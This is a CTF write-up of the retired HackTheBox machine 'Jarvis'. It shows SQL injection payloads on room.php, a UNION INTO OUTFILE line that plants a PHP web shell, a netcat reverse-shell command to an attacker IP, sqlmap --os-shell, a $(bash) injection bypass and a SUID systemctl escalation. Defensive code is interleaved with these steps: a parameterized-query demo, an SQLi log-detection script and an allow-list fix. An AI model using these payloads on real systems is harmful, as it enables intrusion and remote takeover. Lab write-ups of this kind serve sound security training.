Jarvis – HackTheBox writeup
[screenshot: machine info card]

Jarvis is a retired vulnerable machine available from HackTheBox. The machine makers are manulqwerty & Ghostpp7, thank you. It has Medium difficulty with a rating of 4.9 out of 10. I think it’s somewhere between easy & medium.

Kali Linux is used to carry out the enumeration, exploitation and privilege escalation. The goal is to obtain a root shell together with both the user & root flags.

Exploitation Summary

Initial Exploitation

  • Vulnerability: SQL Injection
  • Explanation: Webpage room.php is vulnerable to SQL injection, which leads to command execution.

Privilege Escalation – from www-data

  • Vulnerability: Command execution via sudo ability
  • Explanation: user www-data can run sudo -u pepper /var/www/Admin-Utilities/simpler.py, and that script is vulnerable to command injection, giving command execution as pepper.

Privilege Escalation – from pepper

  • Vulnerability: /bin/systemctl with SUID bit set
  • Explanation: /bin/systemctl runs with root privileges, which leads to arbitrary command execution as root.

Enumeration

nmap -p- -A -T4 10.10.10.143
[screenshot: nmap scan output]
TCP 22: OpenSSH 7.4p1
TCP 80: Apache httpd 2.4.25
TCP 64999: Apache httpd 2.4.25

Both ports 80 & 64999 serve a website using Apache httpd. Let’s check them out.

[screenshot: website on port 80]

Website at port 80 is for Stark Hotel. There are a few pages about dining & hotel rooms.

The webpage at port 64999 shows a message that I am banned for 90 seconds. And it’s the same message for all URLs I tried. This is most likely a rabbit hole. Let’s go back to port 80 to examine further. Most links just point back to the same page, and all pages are information only. The only page that takes input we can tamper with is room.php, with the cod parameter in the query string.

[screenshot: room.php page]

Let’s check whether it’s vulnerable to SQL injection using:

cod=1+and+2=2

Success. The room information is retrieved. That means the parameter is vulnerable to SQL injection. I then use a union statement to determine the number of columns in the query.

cod=1+union+select+1
cod=1+union+select+1,2
cod=1+union+select+1,2,3
cod=1+union+select+1,2,3,4
cod=1+union+select+1,2,3,4,5
cod=1+union+select+1,2,3,4,5,6
cod=1+union+select+1,2,3,4,5,6,7
cod=1+union+select+1,2,3,4,5,6,7,8

I try different numbers of columns, and the page only fails when I try 8 columns. That means the query uses 7 columns.
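The two probes above (the `and 2=2` check and the UNION column count) work because the cod parameter is spliced into the SQL text. The following is an added example, not code from the writeup or the Jarvis box: it reproduces the behaviour against a constructed SQLite table with seven columns (an assumption mirroring the count found above) and puts a string-concatenated query beside the parameterized one, so you can see that the same inputs stop being SQL once they are bound as values.

```python
import sqlite3

# Constructed schema: seven columns, mirroring the column count found above (assumption).
SCHEMA = """
CREATE TABLE room (
    cod INTEGER, name TEXT, price INTEGER, descrip TEXT,
    star INTEGER, image TEXT, mini TEXT
);
INSERT INTO room VALUES (1, 'Superior Family Room', 250, 'constructed sample row', 4, 'r1.jpg', 'm1.jpg');
INSERT INTO room VALUES (2, 'Suite', 400, 'constructed sample row', 5, 'r2.jpg', 'm2.jpg');
"""


def open_db():
    """In-memory database loaded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def fetch_room_vulnerable(conn, cod):
    """String concatenation: whatever arrives in cod becomes part of the SQL text."""
    sql = "SELECT * FROM room WHERE cod=" + cod
    return conn.execute(sql).fetchall()


def fetch_room_safe(conn, cod):
    """Placeholder binding: cod is always a value, never SQL."""
    return conn.execute("SELECT * FROM room WHERE cod=?", (cod,)).fetchall()


def try_union(conn, fetch, n):
    """Run a UNION probe with n columns through `fetch`.

    Returns the number of rows returned, or None if the database rejected the
    query (column-count mismatch, the failure the page sees at 8 columns).
    """
    payload = "1 union select " + ",".join(str(i) for i in range(1, n + 1))
    try:
        return len(fetch(conn, payload))
    except sqlite3.OperationalError:
        return None


def union_column_count(conn, fetch, max_cols=10):
    """Smallest n for which the UNION probe adds a row, or None if no probe ever
    does (which is what happens when the input is bound as a value)."""
    for n in range(1, max_cols + 1):
        rows = try_union(conn, fetch, n)
        if rows is not None and rows > 1:
            return n
    return None


if __name__ == "__main__":
    db = open_db()
    print("vulnerable, 1 and 2=2 ->", len(fetch_room_vulnerable(db, "1 and 2=2")), "row(s)")
    print("safe,       1 and 2=2 ->", len(fetch_room_safe(db, "1 and 2=2")), "row(s)")
    print("vulnerable column count:", union_column_count(db, fetch_room_vulnerable))
    print("safe column count:      ", union_column_count(db, fetch_room_safe))
```

With the concatenated query the tautology still returns room 1 and the UNION probe succeeds at exactly 7 columns; with the bound parameter both inputs are compared as a literal string against the integer column and match nothing. The fix for room.php is the same idea in PHP: a prepared statement with the cod value bound, rather than interpolated into the query.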

All right. Next, try to write a PHP file through SQL injection. If this is successful, we can achieve remote command execution through the injected PHP file:

cod=1+union+select+1,2,3,4,5,6,'<?php system($_GET["cmd"]); ?>' into outfile '/var/www/html/cmd.php'

I then navigate to cmd.php:

http://10.10.10.143/cmd.php?cmd=id
[screenshot: output of id via cmd.php]

That works. Awesome, I can now try to get a reverse shell using netcat.

First, listen on port 4000 with netcat on Kali. Then run netcat through cmd.php:

http://10.10.10.143/cmd.php?cmd=nc+-c+/bin/bash+10.10.14.30+4000
[screenshot: initial reverse shell as www-data]

Initial shell obtained.

Shell through SQLMap

Sqlmap is a great tool that helps perform SQL injection faster. I am doing a quick run using SQLMap to demonstrate its awesomeness.

sqlmap -u http://10.10.10.143/room.php?cod=1
[screenshot: sqlmap output]

Running the sqlmap command does all the dirty work and quickly tells me it’s vulnerable. Next, we can retrieve the database content using the --dump option or try to gain a shell using the --os-shell option.

sqlmap -u http://10.10.10.143/room.php?cod=1 --os-shell
[screenshot: shell via sqlmap --os-shell]

Shell obtained. Fast and easy using sqlmap.

Privilege Escalation – Part 1

sudo -l
[screenshot: sudo -l output]

sudo -l is one of my favorite commands to run after getting an initial shell. The ability to run commands via sudo often leads to privilege escalation. This time, user www-data can run simpler.py as pepper. Let’s see what it does:

sudo -u pepper /var/www/Admin-Utilities/simpler.py
[screenshot: simpler.py menu]

Looks like a utility about attackers. Let’s examine its code.

Apparently, it analyzes log files located at /home/pepper/Web/Logs/, provides statistics, lists the attackers, and offers a quick ping utility. Let’s take a quick look at the Logs directory:

[screenshot: contents of /home/pepper/Web/Logs/]

Interestingly, it has a text file named after my IP address, 10.10.14.30. Its content lists some attacks identified from my IP address. These are the requests I sent while scanning the machine. I wonder how that is collected.

[screenshot: running processes]

Checking the running processes shows that /root/sqli_defender.py is running with root privileges. I think that’s the tool used to identify attacks. It may be a tool we can exploit later to get root access. But let’s keep it for now and go back to the simpler.py command.
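The defender script on the box is not readable from the www-data shell, so the following is an added example of the kind of logic it could contain, written here for this writeup rather than taken from sqli_defender.py or the Jarvis box. It parses Apache combined-format access log lines (constructed below; the source IP and the room.php requests mirror the probes sent earlier in this writeup), URL-decodes each query string, and flags the union/select, into outfile and `and N=N` patterns, then counts hits per source address.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Constructed Apache combined-format log lines (timestamps, sizes and user agent are made up).
SAMPLE_LOG = """\
10.10.14.30 - - [10/Aug/2019:10:01:02 +0000] "GET /room.php?cod=1 HTTP/1.1" 200 4521 "-" "Mozilla/5.0"
10.10.14.30 - - [10/Aug/2019:10:01:09 +0000] "GET /room.php?cod=1+and+2=2 HTTP/1.1" 200 4521 "-" "Mozilla/5.0"
10.10.14.30 - - [10/Aug/2019:10:02:15 +0000] "GET /room.php?cod=1+union+select+1,2,3,4,5,6,7 HTTP/1.1" 200 4610 "-" "Mozilla/5.0"
10.10.14.30 - - [10/Aug/2019:10:03:41 +0000] "GET /room.php?cod=1+union+select+1,2,3,4,5,6,%27x%27+into+outfile+%27/var/www/html/cmd.php%27 HTTP/1.1" 200 4610 "-" "Mozilla/5.0"
10.10.14.5 - - [10/Aug/2019:10:04:00 +0000] "GET /dining.php HTTP/1.1" 200 3900 "-" "Mozilla/5.0"
"""

# Fields of the combined log format that we need: client IP, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Detection rules, applied to the decoded and lower-cased query string.
RULES = [
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("into-outfile", re.compile(r"\binto\s+(out|dump)file\b")),
    ("tautology", re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+")),
]


def decode_query(target):
    """URL-decoded, lower-cased query string of a request target ('+' becomes a space)."""
    return unquote_plus(urlsplit(target).query).lower()


def detect_sqli(log_text):
    """List of (ip, path, rule) tuples, one per rule that matched a request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than crash on junk
        query = decode_query(m["target"])
        path = urlsplit(m["target"]).path
        for name, rx in RULES:
            if rx.search(query):
                hits.append((m["ip"], path, name))
    return hits


def offenders(log_text, threshold=2):
    """Source IPs with at least `threshold` hits, i.e. candidates for a temporary ban."""
    counts = Counter(ip for ip, _, _ in detect_sqli(log_text))
    return {ip: n for ip, n in counts.items() if n >= threshold}


if __name__ == "__main__":
    for ip, path, rule in detect_sqli(SAMPLE_LOG):
        print(f"{ip} {path} matched {rule}")
    print("offenders:", offenders(SAMPLE_LOG))
```

Decoding before matching matters: the `+` and `%27` encodings in the raw request line would otherwise hide the keywords from a plain substring check. A real deployment would also read the log incrementally and consider the 90-second ban behaviour seen on port 64999, which is exactly the kind of response such a script can drive.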

I examine simpler.py’s code further and identify that the ping utility is vulnerable to command injection:

[screenshot: vulnerable ping routine in simpler.py]

The routine checks for some forbidden characters and stops execution if you use them. To escape that check, I used $(bash) to perform command execution and obtain a bash shell. However, standard output is not returned, so I use netcat to get a reverse shell on port 4001.

[screenshot: $(bash) injected into the ping prompt]
[screenshot: reverse shell as pepper]
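The root cause here is a deny-list of characters guarding a string that is later handed to a shell. As an added example (my own code, not simpler.py and not its real forbidden-character list, which is not reproduced here), the block below puts a constructed deny-list check next to the approach that actually closes the hole: accept only a syntactically valid IP address, and run ping with an argument vector and no shell, so that nothing in the input is ever parsed as shell syntax.

```python
import ipaddress
import subprocess

# Constructed deny-list in the spirit of a forbidden-character check
# (assumption: not the actual list used by simpler.py).
FORBIDDEN = set("&|;`><\\")


def denylist_ok(target):
    """Deny-list approach: reject only characters someone thought of."""
    return not any(ch in FORBIDDEN for ch in target)


def allowlist_ip(target):
    """Allow-list approach: accept only a valid IPv4/IPv6 literal, nothing else."""
    try:
        ipaddress.ip_address(target)
    except ValueError:
        return False
    return True


def build_ping_argv(target):
    """argv for ping with the validated address as a single argument; raises on bad input."""
    if not allowlist_ip(target):
        raise ValueError("not an IP address: %r" % (target,))
    return ["ping", "-c", "1", str(ipaddress.ip_address(target))]


def ping(target):
    """Run ping without a shell: the target is one argv entry, so $(...) and
    friends are never interpreted. Returns the process exit status."""
    proc = subprocess.run(build_ping_argv(target), capture_output=True, text=True)
    return proc.returncode


if __name__ == "__main__":
    for candidate in ("10.10.14.30", "10.10.14.30; id", "$(bash)"):
        print("%-16r deny-list ok: %-5s allow-list ok: %s"
              % (candidate, denylist_ok(candidate), allowlist_ip(candidate)))
```

The deny-list passes `$(bash)` because `$`, `(` and `)` are simply not on it, which is the gap the writeup walks through; the allow-list rejects it without needing to know any shell syntax at all. Even with the allow-list, keeping `shell=False` and a list argv is what guarantees the validated value cannot change the command.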

Awesome, I get a shell as user pepper. I now have access to user.txt.

[screenshot: user.txt]

Privilege Escalation – Part 2

It’s not obvious how to exploit the /root/sqli_defender.py as I have no access to the file. So I proceed to perform more enumeration on the box. One of my favorite tools is linenum.sh.

An interesting binary, /bin/systemctl, is found with the SUID bit set. linenum.sh finds it, or you can use the following command:

find / -perm -4000 -user root 2> /dev/null
[screenshot: find output listing SUID binaries]
[screenshot: /bin/systemctl with the SUID bit set]

GTFOBins is a great site with a collection of commands that can be used to achieve privilege escalation, and we can find systemctl right there.

[screenshot: GTFOBins entry for systemctl]

By following the instructions, I am able to get a reverse shell as root on port 4002:

[screenshot: systemctl privilege escalation]
[screenshot: root shell]

Perfect! Root shell obtained. Final task is to obtain the root flag:

[screenshot: root.txt]
